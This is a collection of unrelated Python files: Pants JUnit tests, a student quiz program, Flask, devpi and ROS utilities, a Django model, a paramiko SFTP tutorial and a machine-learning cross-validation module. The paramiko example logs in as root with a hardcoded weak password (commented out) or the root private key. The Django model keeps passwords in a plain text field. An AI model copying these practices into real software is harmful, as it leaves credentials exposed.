*java_util_rules(),
*strip_jar.rules(),
*javac_rules(),
*junit_rules(),
*scala_target_types_rules(),
*scalac_rules(),
*source_files.rules(),
*target_types_rules(),
*util_rules(),
*non_jvm_dependencies_rules(),
get_filtered_environment,
QueryRule(CoarsenedTargets, (Addresses,)),
QueryRule(TestResult, (JunitTestRequest.Batch,)),
],
target_types=[
FileTarget,
FilesGeneratorTarget,
RelocatedFiles,
JvmArtifactTarget,
JavaSourcesGeneratorTarget,
JunitTestsGeneratorTarget,
ScalaJunitTestsGeneratorTarget,
],
)
return rule_runner
@pytest.fixture
def junit4_lockfile_def() -> JVMLockfileFixtureDefinition:
return JVMLockfileFixtureDefinition(
"junit4.test.lock",
["junit:junit:4.13.2"],
)
@pytest.fixture
def junit4_lockfile(
junit4_lockfile_def: JVMLockfileFixtureDefinition, request
) -> JVMLockfileFixture:
return junit4_lockfile_def.load(request)
@maybe_skip_jdk_test
def test_vintage_simple_success(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
junit_tests(
name='example-test',
dependencies= [
'3rdparty/jvm:junit_junit',
],
)
"""
),
"SimpleTest.java": dedent(
"""
package org.pantsbuild.example;
import junit.framework.TestCase;
public class SimpleTest extends TestCase {
public void testHello(){
assertTrue("Hello!" == "Hello!");
}
}
"""
),
}
)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 0
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_simple_failure(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
junit_tests(
name='example-test',
dependencies= [
'3rdparty/jvm:junit_junit',
],
)
"""
),
"SimpleTest.java": dedent(
"""
package org.pantsbuild.example;
import org.junit.Test;
import static org.junit.Assert.*;
public class SimpleTest {
@Test
public void helloTest(){
assertTrue("Goodbye!" == "Hello!");
}
}
"""
),
}
)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 1
assert (
re.search(
r"Finished:.*?helloTest.*?Exception: java.lang.AssertionError",
test_result.stdout,
re.DOTALL,
)
is not None
)
assert re.search(r"1 tests failed", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_success_with_dep(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
java_sources(
name='example-lib',
)
junit_tests(
name = 'example-test',
dependencies = [
'3rdparty/jvm:junit_junit',
'//:example-lib',
],
)
"""
),
"ExampleLib.java": dedent(
"""
package org.pantsbuild.example.lib;
public class ExampleLib {
public static String hello() {
return "Hello!";
}
}
"""
),
"ExampleTest.java": dedent(
"""
package org.pantsbuild.example;
import org.pantsbuild.example.lib.ExampleLib;
import junit.framework.TestCase;
public class ExampleTest extends TestCase {
public void testHello(){
assertTrue(ExampleLib.hello() == "Hello!");
}
}
"""
),
}
)
test_result = run_junit_test(rule_runner, "example-test", "ExampleTest.java")
assert test_result.exit_code == 0
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_scala_simple_success(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
scala_junit_tests(
name='example-test',
dependencies= [
'3rdparty/jvm:junit_junit',
],
)
"""
),
"SimpleTest.scala": dedent(
"""
package org.pantsbuild.example
import junit.framework.TestCase
import junit.framework.Assert._
class SimpleTest extends TestCase {
def testHello(): Unit = {
assertTrue("Hello!" == "Hello!")
}
}
"""
),
}
)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.scala")
assert test_result.exit_code == 0
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@pytest.fixture
def junit5_lockfile_def() -> JVMLockfileFixtureDefinition:
return JVMLockfileFixtureDefinition(
"junit5.test.lock",
["org.junit.jupiter:junit-jupiter-api:5.7.2"],
)
@pytest.fixture
def junit5_lockfile(
junit5_lockfile_def: JVMLockfileFixtureDefinition, request
) -> JVMLockfileFixture:
return junit5_lockfile_def.load(request)
@maybe_skip_jdk_test
def test_jupiter_simple_success(
rule_runner: RuleRunner, junit5_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit5_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit5_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
junit_tests(
name = 'example-test',
dependencies = [
'3rdparty/jvm:org.junit.jupiter_junit-jupiter-api',
],
)
"""
),
"SimpleTest.java": dedent(
"""
package org.pantsbuild.example;
import static org.junit.jupiter.api.Assertions.assertEquals;
import org.junit.jupiter.api.Test;
class SimpleTests {
@Test
void testHello(){
assertEquals("Hello!", "Hello!");
}
}
"""
),
}
)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 0
assert test_result.xml_results and test_result.xml_results.files
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_jupiter_simple_failure(
rule_runner: RuleRunner, junit5_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit5_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit5_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
junit_tests(
name='example-test',
dependencies= [
'3rdparty/jvm:org.junit.jupiter_junit-jupiter-api',
],
)
"""
),
"SimpleTest.java": dedent(
"""
package org.pantsbuild.example;
import static org.junit.jupiter.api.Assertions.assertEquals;
import org.junit.jupiter.api.Test;
class SimpleTest {
@Test
void testHello(){
assertEquals("Goodbye!", "Hello!");
}
}
"""
),
}
)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 1
assert test_result.xml_results and test_result.xml_results.files
assert (
re.search(
r"Finished:.*?testHello.*?Exception: org.opentest4j.AssertionFailedError: expected: <Goodbye!> but was: <Hello!>",
test_result.stdout,
re.DOTALL,
)
is not None
)
assert re.search(r"1 tests failed", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_jupiter_success_with_dep(
rule_runner: RuleRunner, junit5_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit5_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit5_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
java_sources(
name='example-lib',
)
junit_tests(
name = 'example-test',
dependencies = [
'3rdparty/jvm:org.junit.jupiter_junit-jupiter-api',
'//:example-lib',
],
)
"""
),
"ExampleLib.java": dedent(
"""
package org.pantsbuild.example.lib;
public class ExampleLib {
public static String hello() {
return "Hello!";
}
}
"""
),
"SimpleTest.java": dedent(
"""
package org.pantsbuild.example;
import static org.junit.jupiter.api.Assertions.assertEquals;
import org.junit.jupiter.api.Test;
import org.pantsbuild.example.lib.ExampleLib;
class SimpleTest {
@Test
void testHello(){
assertEquals(ExampleLib.hello(), "Hello!");
}
}
"""
),
}
)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 0
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
def _write_file_dependencies(
rule_runner: RuleRunner,
junit_deps: Iterable[str],
path_to_read: str,
junit4_lockfile: JVMLockfileFixture,
):
junit_deps_str = ", ".join(f"'{i}'" for i in junit_deps)
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
f"""\
junit_tests(
name='example-test',
dependencies= [
'3rdparty/jvm:junit_junit',
{junit_deps_str}
],
)
file(
name="duck",
source="ducks.txt",
)
files(
name="ducks",
sources=["*.txt"],
)
relocated_files(
name="relocated_ducks",
files_targets=[":duck"],
src="",
dest="ducks",
)
"""
),
"SimpleTest.java": dedent(
f"""
package org.pantsbuild.example;
import junit.framework.TestCase;
import java.nio.file.Files;
import java.nio.file.Path;
public class SimpleTest extends TestCase {{
public void testHello() throws Exception {{
assertEquals("lol ducks", Files.readString(Path.of("{path_to_read}")));
}}
}}
"""
),
"ducks.txt": "lol ducks",
}
)
@maybe_skip_jdk_test
def test_vintage_file_dependency(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
_write_file_dependencies(rule_runner, [":duck"], "ducks.txt", junit4_lockfile)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 0
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_files_dependencies(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
_write_file_dependencies(rule_runner, [":ducks"], "ducks.txt", junit4_lockfile)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 0
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@pytest.mark.skip # TODO(14537) `relocated_files` doesn't presently work, un-skip when fixing that.
@pytest.mark.no_error_if_skipped
@maybe_skip_jdk_test
def test_vintage_relocated_files_dependency(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
_write_file_dependencies(rule_runner, [":relocated_ducks"], "ducks/ducks.txt", junit4_lockfile)
test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
assert test_result.exit_code == 0
assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
assert re.search(r"1 tests successful", test_result.stdout) is not None
assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_extra_env_vars(
rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
rule_runner.write_files(
{
"3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
"3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
"BUILD": dedent(
"""\
junit_tests(
name="example-test",
extra_env_vars=[
"JUNIT_TESTS_VAR_WITHOUT_VALUE",
"JUNIT_TESTS_VAR_WITH_VALUE=junit_tests_var_with_value",
"JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR=junit_tests_override_with_value_var_override",
],
)
"""
),
"ExtraEnvVarsTest.java": dedent(
"""\
package org.pantsbuild.example;
import junit.framework.TestCase;
public class ExtraEnvVarsTest extends TestCase {
public void testArgs() throws Exception {
assertEquals(System.getenv("ARG_WITH_VALUE_VAR"), "arg_with_value_var");
assertEquals(System.getenv("ARG_WITHOUT_VALUE_VAR"), "arg_without_value_var");
assertEquals(System.getenv("JUNIT_TESTS_VAR_WITH_VALUE"), "junit_tests_var_with_value");
assertEquals(System.getenv("JUNIT_TESTS_VAR_WITHOUT_VALUE"), "junit_tests_var_without_value");
assertEquals(System.getenv("JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR"), "junit_tests_override_with_value_var_override");
}
}
"""
),
}
)
result = run_junit_test(
rule_runner,
"example-test",
"ExtraEnvVarsTest.java",
extra_args=[
'--test-extra-env-vars=["ARG_WITH_VALUE_VAR=arg_with_value_var", "ARG_WITHOUT_VALUE_VAR", "JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR"]'
],
env={
"ARG_WITHOUT_VALUE_VAR": "arg_without_value_var",
"JUNIT_TESTS_VAR_WITHOUT_VALUE": "junit_tests_var_without_value",
"JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR": "junit_tests_override_with_value_var",
},
)
assert result.exit_code == 0
|
#################################################################################
# Name : Matthew Nummy
# Date : 11/25/2020
# Assignment : Quiz 2 - Part 2
# Pledge : I pledge my Honor that I have abided by the Stevens Honor System
# I understand that I may access the course textbook and course lecture notes but I am not to access any
# other resource. I also pledge that I worked alone on this exam.
#################################################################################
def addition(x, y):
return x + y
def subtraction(x, y):
return x - y
def multiplication(x, y):
return x * y
def division(x, y):
return x / y
# Finds and returns the number of vowels in the provided string.
def vowel_finder(string):
i = 0
vowels = set("aeiouAEIOU")
for alphabet in string:
if alphabet in vowels:
i += 1
return i
# Creates an array where each index contains a letter from the string. Spaces are removed.
def split_string(string):
string_array = [char for char in string]
remove = [' ']
return [i for i in string_array if i not in remove]
# This function creates the string encryption.
def string_encryption(string):
letter_array = split_string(string)
word_array = string.split(' ')
space_array = [0] * len(word_array)
# letter_dict assigns each letter in the alphabet a numerical key 1-26. The keys are assigned based on the
# frequency with which the letters appear in the english language.
letter_dict = dict({1: ['E', 'e'],
2: ['T', 't'],
3: ['A', 'a'],
4: ['O', 'o'],
5: ['I', 'i'],
6: ['N', 'n'],
7: ['S', 's'],
8: ['H', 'h'],
9: ['R', 'r'],
10: ['D', 'd'],
11: ['L', 'l'],
12: ['C', 'c'],
13: ['U', 'u'],
14: ['M', 'm'],
15: ['W', 'w'],
16: ['F', 'f'],
17: ['G', 'g'],
18: ['Y', 'y'],
19: ['P', 'p'],
20: ['B', 'b'],
21: ['V', 'v'],
22: ['K', 'k'],
23: ['J', 'j'],
24: ['X', 'x'],
25: ['Q', 'q'],
26: ['Z', 'z']})
# This dictionary will be used to represent the length of the preceding word as [a] letter(s). Max word length of
# 52 characters (represented as ZZ).
spaces_dict = dict({1: 'A',
2: 'B',
3: 'C',
4: 'D',
5: 'E',
6: 'F',
7: 'G',
8: 'H',
9: 'I',
10: 'J',
11: 'K',
12: 'L',
13: 'M',
14: 'N',
15: 'O',
16: 'P',
17: 'Q',
18: 'R',
19: 'S',
20: 'T',
21: 'U',
22: 'V',
23: 'W',
24: 'X',
25: 'Y',
26: 'Z'})
# Replaces letters in letter_array with corresponding numerical keys.
for i in range(len(letter_array)):
for j in range(1, 27):
if letter_array[i] in letter_dict[j]:
letter_array[i] = j
# Creates array of letters that represent word lengths.
for i in range(len(word_array)):
if len(word_array[i]) < 27:
space_array[i] = spaces_dict[len(word_array[i])]
elif 26 < len(word_array[i]) < 53:
remainder = len(word_array[i]) - 26
space_array[i] = 'Z' + spaces_dict[remainder]
else:
return "Error"
return string_builder(word_array, letter_array, space_array)
# This function builds the string that is printed to the console.
def string_builder(word_array, letter_array, space_array):
encrypted_string_array = [0] * len(letter_array)
encrypted_string = ""
pop_list = []
word_lengths = []
# Fills array with encrypted letters
for i in range(len(letter_array)):
encrypted_string_array[i] = letter_array[i]
# Places "word-length letters" after each word.
for i in range(len(word_array)):
gap_between_spaces = sum(word_lengths) + i + len(word_array[i])
encrypted_string_array.insert(gap_between_spaces, space_array[i])
word_lengths.append(len(word_array[i]))
# Removes extra 0s from encrypted_string_array and turns the array into a string.
for i in range(len(encrypted_string_array)):
if encrypted_string_array[i] == 0:
pop_list.append(i)
else:
encrypted_string += str(encrypted_string_array[i])
for i in reversed(pop_list):
encrypted_string_array.pop(i)
return encrypted_string
def main():
# Parsing user input.
print("For Mathematical Functions, Please Enter the Number 1")
print("For String Operations, Please Enter the Number 2")
main_menu_choice = raw_input("Your choice: ")
if not unicode(main_menu_choice).isnumeric():
print("Invalid input. 1 or 2 expected.")
return 0
main_menu_choice = int(main_menu_choice)
if main_menu_choice == 1:
print("For Addition, Please Enter the Number 1")
print("For Subtraction, Please Enter the Number 2")
print("For Multiplication, Please Enter the Number 3")
print("For Division, Please Enter the Number 4")
math_func_choice = raw_input("Your choice: ")
if not unicode(math_func_choice).isnumeric():
print("Invalid input. 1, 2, 3 or 4 expected.")
return 0
math_func_choice = int(math_func_choice)
if math_func_choice == 1:
x = int(input("Enter your first operand: "))
y = int(input("Enter your second operand: "))
result = addition(x, y)
print("The sum of " + str(x) + " and " + str(y) + " is " + str(result) + ".")
elif math_func_choice == 2:
x = int(input("Enter your first operand: "))
y = int(input("Enter your second operand: "))
result = subtraction(x, y)
print("The difference between " + str(x) + " and " + str(y) + " is " + str(result) + ".")
elif math_func_choice == 3:
x = int(input("Enter your first operand: "))
y = int(input("Enter your second operand: "))
result = multiplication(x, y)
print("The product of " + str(x) + " and " + str(y) + " is " + str(result) + ".")
elif math_func_choice == 4:
x = int(input("Enter your first operand: "))
y = int(input("Enter your second operand: "))
result = division(x, y)
print("The quotient of " + str(x) + " divided by " + str(y) + " is " + str(result) + ".")
else:
print("Invalid input. 1, 2, 3 or 4 expected.")
elif main_menu_choice == 2:
print("To Determine the Number of Vowels in a String; Enter the Number 1")
print("To Encrypt a String; Enter the Number 2")
string_operation_choice = raw_input("Your choice: ")
string = raw_input("Enter your string: ")
if not unicode(string_operation_choice).isnumeric():
print("Invalid input (string operation choice). 1 or 2 expected. 1")
return 0
string_operation_choice = int(string_operation_choice)
if string != '' and all(chr.isalpha() or chr.isspace() for chr in string):
if string_operation_choice == 1:
print("There are " + str(vowel_finder(string)) + " vowels in the word(s) '" + string + "'.")
elif string_operation_choice == 2:
if string_encryption(string) == 'Error':
print("Error: String contains a word longer than 52 characters.")
return 0
else:
result = string_encryption(string)
print("Your encrypted string is: " + result)
else:
print("Invalid input (string operation choice). 1 or 2 expected. 2")
else:
print("Invalid input (string). Only letters and spaces allowed.")
else:
print("Invalid input. 1 or 2 expected.")
main()
|
# -*- coding: utf-8 -*-
#
# This file is part of Flask-AppExts
# Copyright (C) 2015 CERN.
#
# Flask-AppExts is free software; you can redistribute it and/or
# modify it under the terms of the Revised BSD License; see LICENSE
# file for more details.
"""Flask-Collect extension."""
from __future__ import absolute_import, unicode_literals, print_function
import click
from flask_collect import Collect
from flask_cli import with_appcontext
from flask import current_app
@click.command()
@click.option('-v', '--verbose', default=False, is_flag=True)
@with_appcontext
def collect(verbose=False):
"""Collect static files."""
current_app.extensions['collect'].collect(verbose=verbose)
def setup_app(app):
"""Initialize Menu."""
def filter_(items):
"""Filter application blueprints."""
order = [blueprint.name for blueprint in
app.extensions['registry']['blueprints']]
def _key(item):
if item.name in order:
return order.index(item.name)
return -1
return sorted(items, key=_key)
app.config.setdefault('COLLECT_FILTER', filter_)
app.config.setdefault('COLLECT_STATIC_ROOT', app.static_folder)
ext = Collect(app)
# unsetting the static_folder so it's not picked up by collect.
class FakeApp(object):
name = "fakeapp"
has_static_folder = False
static_folder = None
ext.app = FakeApp()
app.cli.add_command(collect)
|
from collections import defaultdict
from devpi_server.log import threadlog as log
from devpi_server.readonly import get_mutable_deepcopy
from devpi_web.whoosh_index import project_name
from elasticsearch import Elasticsearch
from elasticsearch.helpers import streaming_bulk
class Index:
def __init__(self):
self.index = 'devpi'
self.es = Elasticsearch()
def delete_index(self):
self.es.indices.delete(index=self.index, ignore_unavailable=True)
def _update_projects(self, projects):
main_keys = [
'path', 'name', 'user', 'index', 'classifiers', 'keywords',
'version', 'doc_version', 'type',
'text_path', 'text_title', 'text']
for i, project in enumerate(projects, 1):
data = {
x: get_mutable_deepcopy(project[x])
for x in main_keys if x in project}
data['path'] = u"/{user}/{index}/{name}".format(**data)
data['type'] = "project"
data['text'] = "%s %s" % (data['name'], project_name(data['name']))
yield dict(
_index=self.index,
_type=data['type'],
_id=data['path'],
_source=data)
def update_projects(self, projects, clear=False):
results = streaming_bulk(client=self.es, actions=self._update_projects(projects))
for i, result in enumerate(results):
if i % 1000 == 0:
log.info("Indexed %s", i)
def query_projects(self, querystring, page=1):
items = []
result_info = dict()
result = {"items": items, "info": result_info}
res = self.es.search(
index=self.index,
body={"query": {"match_all": {}}},
from_=(page - 1) * 10)
hits = res.pop('hits')
raw_items = hits.pop('hits')
print(res)
print(hits)
result_info['collapsed_counts'] = defaultdict(int)
result_info['pagecount'] = hits['total'] // 10
if result_info['pagecount'] > 999:
result_info['pagecount'] = 999
result_info['pagenum'] = page
result_info['total'] = hits['total']
for item in raw_items:
info = dict(
data=dict(item['_source']),
sub_hits=())
items.append(info)
return result
def get_query_parser_html_help(self):
return []
|
../../process/base/common_base.py |
#!\usr\bin\env python
import os
import sys
import subprocess as sp
dimensions = \
{"merged":63, \
"colorNormalHist":45, \
"colorHSV":3, \
"colorRGB":3, \
"colorH":5, \
"colorS":5, \
"colorV":5, \
"colorHist":30, \
"normal":3, \
"normalX":5, \
"normalY":5, \
"normalZ":5, \
"normalHist":15, \
"normalHistLarge":27, \
"fpfh":33, \
"colorHSVNormal":6, \
"colorRGBNormal":6, \
"colorLab":6, \
"colorLabHist":15, \
"colorLabNormalHist":30, \
"merge":0}
for folder in os.listdir(sys.argv[1]) :
print(folder)
sp.call(["roslaunch","dream_babbling","classifier_eval.launch", \
"archive_folder:="+ sys.argv[1] + folder, \
"method:=gmm", \
"modality:=colorLabHist", \
"dimension:="+str(dimensions["colorLabHist"]), \
"number_of_iteration:=100", \
"output_file:=classifier_eval_colorLabHist.yml"])
for folder in os.listdir(sys.argv[1]) :
print(folder)
sp.call(["roslaunch","dream_babbling","classifier_eval.launch", \
"archive_folder:="+ sys.argv[1] + folder, \
"method:=gmm", \
"modality:=normalHistLarge", \
"dimension:="+str(dimensions["normalHistLarge"]), \
"number_of_iteration:=100", \
"output_file:=classifier_eval_normalHistLarge.yml"])
for folder in os.listdir(sys.argv[1]) :
print(folder)
sp.call(["roslaunch","dream_babbling","classifier_eval.launch", \
"archive_folder:="+ sys.argv[1] + folder, \
"method:=mcs", \
"modality:=merge", \
"dimension:="+str(dimensions["merge"]), \
"number_of_iteration:=100", \
"output_file:=classifier_eval.yml"])
for folder in os.listdir(sys.argv[1]) :
print(folder)
sp.call(["roslaunch","dream_babbling","classifier_eval.launch", \
"archive_folder:="+ sys.argv[1] + folder, \
"method:=gmm", \
"modality:=fpfh", \
"dimension:="+str(dimensions["fpfh"]), \
"number_of_iteration:=100", \
"output_file:=classifier_eval_fpfh.yml"]) |
class CoreException(Exception):
"""Exists for the benefit of making the cli easier to catch exceptions."""
class SubmoduleFindingError(CoreException):
"""when struggling to find the submodule."""
class DirtyRepoError(CoreException):
"""dirty repo, d'uh"""
class MasterBranchError(CoreException):
"""Not on the right branch"""
class PushBranchError(CoreException):
"""struggling to find the branch"""
class RemoteURLError(CoreException):
"""when a remote's URL isn't awesome"""
class PuenteVersionError(CoreException):
"""when something's wrong trying to figure out the next puente version"""
|
# At start-up, a Thread does some basic initialization and then calls its run()
# methond, which calls the target function passed to the constructor. To create
# a subclass of Thread, override run() to do whatever is necessary.
import threading
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
class MyThread(threading.Thread):
def run(self):
logging.debug('running')
for i in range(5):
t = MyThread()
t.start()
|
# paramiko模块支持以加密和认证的方式连接远程服务器。可以实现远程文件的上传,下载或通过**==ssh==**远程执行命令。
# 安装: pip3.6 install paramiko
# paramiko模块远程上传下载文件
import paramiko # 导入import模块
# trans = paramiko.Transport(("10.1.1.12",22)) # 产生连接10.1.1.12的22的传输,赋值给trans
#
# trans.connect(username="root",password="123456") # 指定连接用户名与密码
#
# sftp = paramiko.SFTPClient.from_transport(trans) # 指定为sftp传输方式
#
# sftp.get("/etc/fstab","/tmp/fstab") # 把对方机器的/etc/fstab下载到本地为/tmp/fstab(注意不能只写/tmp,必须要命名)
# sftp.put("/etc/inittab","/tmp/inittab") # 本地的上传,也一样要命令
#
# trans.close()
# paramiko模块实现文件的上传下载(免密登录)
# 需要提前做好免密登录(ssh-keygen,ssh-copy-id xx)
trans = paramiko.Transport(("10.1.1.12",22)) # 产生连接10.1.1.12的22的传输,赋值给trans
private_key = paramiko.RSAKey.from_private_key_file("/root/.ssh/id_rsa") # 指定本机私钥路径
trans.connect(username="root",pkey=private_key) # 提前使用ssh-keygen做好免密登录
sftp = paramiko.SFTPClient.from_transport(trans)
sftp.get("/etc/fstab","/tmp/fstab2")
sftp.put("/etc/inittab","/tmp/inittab2")
trans.close()
|
#coding=utf8
from django.db import models
# Create your models here.
class Accounts(models.Model):
usr_name = models.CharField(max_length = 64)
passwd = models.CharField(max_length = 256)
email = models.EmailField()
phone = models.CharField(max_length = 32)
qq = models.CharField(max_length = 64)
|
# -*- coding: utf-8 -*-
#
# Copyright 2016 Ramil Nugmanov <stsouko@live.ru>
# This file is part of MODtools.
#
# MODtools is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
import tempfile
import shutil
import numpy as np
import operator
import pandas as pd
from collections import defaultdict
from itertools import product
from copy import deepcopy
from math import sqrt, ceil
from sklearn.externals.joblib import Parallel, delayed
from sklearn.utils import shuffle
from sklearn.cross_validation import KFold
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error, r2_score, cohen_kappa_score, accuracy_score
class Score(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
def __comparer(self, other, op):
return all(op(y, other[x]) for x, y in self.items())
def __lt__(self, other):
return self.__comparer(other, operator.lt)
def __le__(self, other):
return self.__comparer(other, operator.le)
def _kfold(est, x, y, train, test, svmparams, normalize, box):
x_train, y_train = x.iloc[train], y.iloc[train]
x_test, y_test = x.iloc[test], y.iloc[test]
x_min = x_train.min().loc[box]
x_max = x_train.max().loc[box]
y_min = y_train.min()
y_max = y_train.max()
x_ad = ((x_test.loc[:, box] - x_min).min(axis=1) >= 0) & ((x_max - x_test.loc[:, box]).min(axis=1) >= 0)
if normalize:
normal = MinMaxScaler()
x_train = pd.DataFrame(normal.fit_transform(x_train), columns=x_train.columns)
x_test = pd.DataFrame(normal.transform(x_test), columns=x_train.columns)
else:
normal = None
model = est(**svmparams)
model.fit(x_train, y_train)
y_pred = pd.Series(model.predict(x_test), index=y_test.index)
y_ad = (y_pred >= y_min) & (y_pred <= y_max)
output = dict(model=model, normal=normal, x_min=x_min, x_max=x_max, y_min=y_min, y_max=y_max,
y_test=y_test, y_pred=y_pred, x_ad=x_ad, y_ad=y_ad)
if hasattr(model, 'predict_proba'):
output['y_prob'] = pd.DataFrame(model.predict_proba(x_test), index=y_test.index, columns=model.classes_)
return output
def _rmse(y_test, y_pred):
return sqrt(mean_squared_error(y_test, y_pred))
def _balance_acc(y_test, y_pred):
return accuracy_score(y_test, y_pred, normalize=True)
def _iap(y_test, y_prob):
res = defaultdict(list)
for sid, s_prob in y_prob.groupby(level='structure'):
s_test = y_test.xs(sid, level='structure', drop_level=False)
for col in s_prob.columns:
in_class = s_test.loc[s_test == col].index
out_class = s_test.loc[s_test != col].index
in_class_dominance = sum(s_prob.loc[i][col] > s_prob.loc[o][col] for i, o in product(in_class, out_class))
possible_combo = len(in_class) * len(out_class)
res[col].append(in_class_dominance / possible_combo if possible_combo else 0)
res = Score({x: sum(y) / len(y) for x, y in res.items()})
return res
class BaseModel(object):
def __init__(self, descriptorgen, structures, workpath='.', nfold=5, repetitions=1, rep_boost=100, dispcoef=0,
fit='rmse', scorers=('rmse', 'r2'), normalize=False, n_jobs=2, **kwargs):
_scorers = dict(rmse=(_rmse, False), r2=(r2_score, False),
kappa=(cohen_kappa_score, False), ba=(_balance_acc, False), iap=(_iap, True))
self.__model = {}
self.__descriptorgen = descriptorgen
self.setworkpath(workpath)
self.__nfold = nfold
self.__repetitions = repetitions
self.__rep_boost = ceil(repetitions * (rep_boost % 100) / 100) or repetitions
self.__n_jobs = n_jobs
self.__normalize = normalize
self.__dispcoef = dispcoef
self.__scorers = {x: _scorers[x] for x in scorers if x in _scorers}
self.__fitscore = 'C' + (fit if fit in scorers else scorers[0])
self.__scorereporter = '\n'.join(['{0} +- variance = %({0})s +- %(v{0})s'.format(i) for i in self.__scorers])
print("Descriptors generation start")
xy = descriptorgen.get(structures, **kwargs)
self.__x = xy['X']
self.__y = xy['Y']
self.__box = xy.get('BOX', xy['X'].columns)
print("Descriptors generated")
self.__crossval()
self.delworkpath()
def setworkpath(self, workpath):
self.__workpath = tempfile.mkdtemp(dir=workpath)
self.__descriptorgen.setworkpath(self.__workpath)
def delworkpath(self):
shutil.rmtree(self.__workpath)
